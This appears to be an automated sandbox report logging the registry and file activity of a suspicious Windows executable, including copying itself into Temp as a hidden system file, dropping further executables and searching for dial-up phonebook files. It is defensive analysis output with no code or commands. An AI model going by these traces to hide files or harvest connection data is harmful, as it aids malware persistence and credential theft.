HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypespreadsheet “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypespreadsheet “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypespreadsheet “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypetext “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypetext “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypetext “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypetext “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypevideo “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypevideo “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypevideo “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypevideo “ScriptOk”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”
HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”
HKEY_LOCAL_MACHINESOFTWAREClassesTypeLib{420B2830-E718-11CF-893D-00A0C9054228}1.0 “win32”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
Enums     HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlers
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlersFile
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedType

File Changes by all processes
New Files     C:DOKUME~1ADMINI~1LOKALE~1TempVAD33.exe
DeviceRasAcd
C:DOKUME~1ADMINI~1LOKALE~1TempsWo_log_2211326.tmp
DeviceTcp
DeviceIp
DeviceIp
C:DOKUME~1ADMINI~1LOKALE~1Tempddsds.exe
Opened Files     C:WINDOWSRegistrationR000000000007.clb
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:DOKUME~1ADMINI~1LOKALE~1Temp
C:WINDOWSRegistrationR000000000007.clb
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:DOKUME~1ADMINI~1LOKALE~1Temp
.PIPElsarpc
c:autoexec.bat
.PIPEROUTER
.Ip
.PIPEwkssvc
C:ProgrammeWindows Desktop SearchMSNLNamespaceMgr.dll
C:WINDOWSRegistrationR000000000007.clb
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:DOKUME~1ADMINI~1LOKALE~1Temp
C:WINDOWSRegistrationR000000000007.clb
C:WINDOWSsystem32scrrun.dll
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:DOKUME~1ADMINI~1LOKALE~1Temp
Deleted Files   
Chronological Order     Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:WINDOWSsystem32.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWSHelp.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:DOKUME~1ADMINI~1LOKALE~1TempVAD33.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:va.exe to C:DOKUME~1ADMINI~1LOKALE~1TempVAD33.exe
Set File Attributes: C:DOKUME~1ADMINI~1LOKALE~1TempVAD33.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:DOKUME~1ADMINI~1LOKALE~1Temp ()
Find File: C:DOKUME~1ADMINI~1LOKALE~1TempVAD33.exe
Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:DOKUME~1ADMINI~1LOKALE~1Temp ()
Find File: C:DOKUME~1ADMINI~1LOKALE~1TempVAD33.exe
Get File Attributes: C:WINDOWSsystem32.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWSHelp.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: DeviceRasAcd (OPEN_ALWAYS)
Get File Attributes: C:DOKUME~1ADMINI~1LOKALE~1TempsWo_log_2211326.tmp Flags: (SECURITY_ANONYMOUS)
Create File: C:DOKUME~1ADMINI~1LOKALE~1TempsWo_log_2211326.tmp
Open File: .PIPElsarpc (OPEN_EXISTING)
Get File Attributes: c:autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:autoexec.bat (OPEN_EXISTING)
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Find File: C:WINDOWSsystem32Ras*.pbk
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Open File: .PIPEROUTER (OPEN_EXISTING)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Open File: .PIPEwkssvc (OPEN_EXISTING)
Get File Attributes: C:DOKUME~1ADMINI~1LOKALE~1Temp Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:DOKUME~1ADMINI~1LOKALE~1Tempddsds.exe Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWS Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:Dokumente und EinstellungenAdministratorEigene Dateiendesktop.ini Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:Dokumente und EinstellungenAll UsersDokumentedesktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:ProgrammeWindows Desktop SearchMSNLNamespaceMgr.dll (OPEN_EXISTING)
Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:DOKUME~1ADMINI~1LOKALE~1Tempddsds.exe:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:DOKUME~1ADMINI~1LOKALE~1Temp ()
Find File: C:DOKUME~1ADMINI~1LOKALE~1Tempddsds.exe
Create/Open File: C:DOKUME~1ADMINI~1LOKALE~1Tempddsds.exe (OPEN_ALWAYS)
Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
Open File: C:WINDOWSsystem32scrrun.dll (OPEN_EXISTING)
Get File Attributes: C:DOKUME~1ADMINI~1LOKALE~1Tempddsds.exe Flags: (SECURITY_ANONYMOUS)
Find File: C:DOKUME~1ADMINI~1LOKALE~1Tempddsds.exe
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:DOKUME~1ADMINI~1LOKALE~1Temp ()
Get File Attributes: C:WINDOWSsystem32.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWSHelp.HLP Flags: (SECURITY_ANONYMOUS)